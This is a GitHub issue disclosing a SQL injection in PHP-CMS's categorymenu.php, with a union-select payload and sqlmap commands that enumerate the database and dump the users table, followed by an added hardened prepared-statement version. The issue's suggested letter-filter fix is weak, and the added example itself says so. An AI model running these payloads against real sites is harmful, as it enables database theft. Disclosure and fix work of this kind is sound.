PHP-CMS

SQL injection in categorymenu page

Open b1u3s opened this issue 2 years ago • 4 comments

Description

I found a SQL injection vulnerability in the page categorymenu.php and built a local environment to test it.

The url is http://127.0.0.1/PHP-CMS/categorymenu.php


The problem code is here.

<?php
if(isset($_GET['category'])){
    $post_category_id = $_GET['category'];   // raw, unvalidated user input
}
// the GET value is interpolated straight into the SQL text, so a value such as
// "-1 union select ..." becomes part of the statement that MySQL executes
$query = "SELECT * FROM posts WHERE post_category_id = {$post_category_id} ";
$select_all_posts_count_query = mysqli_query($connection,$query);
$count = mysqli_num_rows($select_all_posts_count_query);
confirm_query($select_all_posts_count_query);
……
// every column of every returned row is later echoed into the page,
// which is why the injected user() value shows up in the output
while($row = mysqli_fetch_assoc($select_all_posts_count_query)){
    $post_id = $row['post_id'];
    $post_title = $row['post_title'];
    $post_user = $row['post_user'];
    $post_date = $row['post_date'];
    $post_image = $row['post_image'];
    $post_content = $row['post_content'];
?>

Users can control the parameter "category" via the GET method without any filter and retrieve data that should not be queryable. For example, if "category" is changed to "-1 union select 1,2,user(),4,5,6,7,8,9,10,11", you will get the database user:


Proof

I used sqlmap to do this.

1. Get database information.

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 --dbs


2. Select a database and get the table information.

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms --tables


3. Select a table and get its columns.

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users --columns

4. Select a column and dump its contents.

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users -C username --dump

Solution

You can fix it by adding some filter rules on the parameter "category", such as banning letter characters.

b1u3s avatar Mar 03 '22 15:03 b1u3s
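The following is an added example, not code from PHP-CMS or from the issue author. It shows what the original string-building line sends to MySQL for the payload quoted in the issue, and next to it a hardened replacement for categorymenu.php. It assumes the table and column names visible in the issue (posts, post_category_id, post_id, post_title, ...) and a mysqli handle named $connection, as in the original snippet; it also assumes the mysqlnd driver so that get_result() is available. One caveat on the suggested fix: filtering out letters alone is not enough, because a value made only of digits and punctuation, such as 1||1=1, still changes the meaning of the WHERE clause under MySQL's default SQL mode (|| is OR there). Whitelisting the exact expected form of the value and binding it as a typed parameter closes the hole regardless of what characters an attacker tries.

```php
<?php
// Added example (not PHP-CMS code): vulnerable query construction beside a hardened version.

// 1. What the original line in categorymenu.php actually hands to mysqli_query()
//    for a given "category" value. Same string-building as the vulnerable code.
function build_vulnerable_query(string $raw_category): string {
    return "SELECT * FROM posts WHERE post_category_id = {$raw_category} ";
}

// Constructed payload from the issue: posts has 11 columns, so user() lands in column 3.
$payload = "-1 union select 1,2,user(),4,5,6,7,8,9,10,11";
echo build_vulnerable_query($payload), PHP_EOL;
// A letters-only blocklist would still pass this one, which returns every post:
echo build_vulnerable_query("1||1=1"), PHP_EOL;

// 2. Hardened version. Two independent layers: strict validation of the parameter's
//    form, and a prepared statement so the value is bound rather than spliced into SQL.
function parse_category_id(?string $raw): ?int {
    // A category id is a plain positive decimal integer and nothing else.
    // \A and \z anchor the whole value, so "1||1=1" and "-1 union ..." both fail.
    if ($raw === null || !preg_match('/\A[1-9][0-9]{0,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function fetch_posts_by_category(mysqli $connection, int $category_id): array {
    // Select named columns rather than *, and bind the id as an integer ('i').
    $sql = "SELECT post_id, post_title, post_user, post_date, post_image, post_content
            FROM posts WHERE post_category_id = ?";
    $stmt = $connection->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException("prepare failed: " . $connection->error);
    }
    $stmt->bind_param('i', $category_id);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // requires mysqlnd (assumed)
    $stmt->close();
    return $rows;
}

// 3. Request handling as categorymenu.php could do it. The database part only runs when
//    a mysqli handle named $connection exists (as in the original page), so the script
//    still runs offline and prints the two query strings above.
echo parse_category_id("7") === 7 ? "7 accepted" : "7 rejected", PHP_EOL;          // 7 accepted
echo parse_category_id($payload) === null ? "payload rejected" : "payload accepted", PHP_EOL; // payload rejected
echo parse_category_id("1||1=1") === null ? "1||1=1 rejected" : "1||1=1 accepted", PHP_EOL;  // 1||1=1 rejected

if (isset($connection) && $connection instanceof mysqli) {
    $category_id = parse_category_id($_GET['category'] ?? null);
    if ($category_id === null) {
        http_response_code(400);
        exit('invalid category');
    }
    foreach (fetch_posts_by_category($connection, $category_id) as $row) {
        // Output encoding for the template: separate from the injection, but cheap to get right here.
        echo '<h2>' . htmlspecialchars($row['post_title'], ENT_QUOTES, 'UTF-8') . '</h2>', PHP_EOL;
    }
}
```

Run it from the command line with `php example.php` to see the two query strings and the validation results; dropped into the page with a live $connection, it replaces the interpolated query with the bound one, and sqlmap's `--dbs` run against `?category=1` no longer finds an injectable parameter because no part of the request ever reaches the SQL text.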